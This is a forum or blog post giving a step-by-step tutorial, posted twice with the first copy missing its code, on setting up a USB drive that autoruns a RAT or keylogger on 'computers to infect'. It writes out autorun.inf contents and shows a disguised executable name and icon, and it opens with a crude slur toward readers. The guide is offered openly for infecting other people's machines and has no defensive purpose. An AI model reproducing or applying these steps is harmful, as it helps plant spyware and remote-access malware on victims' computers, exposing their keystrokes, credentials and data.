I will be teaching all of you lovely female dogs of how to make a USB autorun an application such as a RAT or Keylogger
What you need:
• A USB that you don't care about
• Your RAT, bot, etc
• Computers to infect
1.
First your going to wanna plug in your USB, then click start and press computer. Go over to you USB and right click and press format after that press restore device defaults. This pretty much just clears everything off your USB to make it run faster.
2.
Now that you have reformatted your USB, go to notepad and put this:
Here's what these commands do :
'open=' opens a specific file you want in your flash drive, Put Your Virus Name .exe
'action=' is what will be displayed on the autorun menu, you can name it anything really.
'label=' it will rename your flash drive to whatever is after the =
'icon=' will change the icon of the flash drive u can use a .exe icon or a .ico icon
Example of what I use:
You can get any .ico off the internet and use that.
Now click file, save as and save it as autorun.inf
3.
You can close out of all that now. From here just put the your icon, your application, and the autorun.inf file on your USB.
4.
Now just plug your USB into any computer you see and the press enter, you have to press enter to select and run your server.
I hope you've enjoyed this little tutorial I made! :)
Thought I would share some after lurking for a long time.
What you need:
• A USB that you don't care about
• Your RAT, bot, etc
• Computers to infect
1.
First your going to wanna plug in your USB, then click start and press computer. Go over to you USB and right click and press format after that press restore device defaults. This pretty much just clears everything off your USB to make it run faster.
2.
Now that you have reformatted your USB, go to notepad and put this:
Code:
[autorun]
open=filename.exe
action=randomtexthere
label=renameflashdrive
icon=randomicon.ico
Here's what these commands do :
'open=' opens a specific file you want in your flash drive, Put Your Virus Name .exe
'action=' is what will be displayed on the autorun menu, you can name it anything really.
'label=' it will rename your flash drive to whatever is after the =
'icon=' will change the icon of the flash drive u can use a .exe icon or a .ico icon
Example of what I use:
Code:
[autorun]
open=networking.exe
action=networking
label=MyFlashDrive
icon=Hardware.ico
You can get any .ico off the internet and use that.
Now click file, save as and save it as autorun.inf
3.
You can close out of all that now. From here just put the your icon, your application, and the autorun.inf file on your USB.
4.
Now just plug your USB into any computer you see and the press enter, you have to press enter to select and run your server.
I hope you've enjoyed this little tutorial I made! :)
Thought I would share some after lurking for a long time.
0 comments:
Post a Comment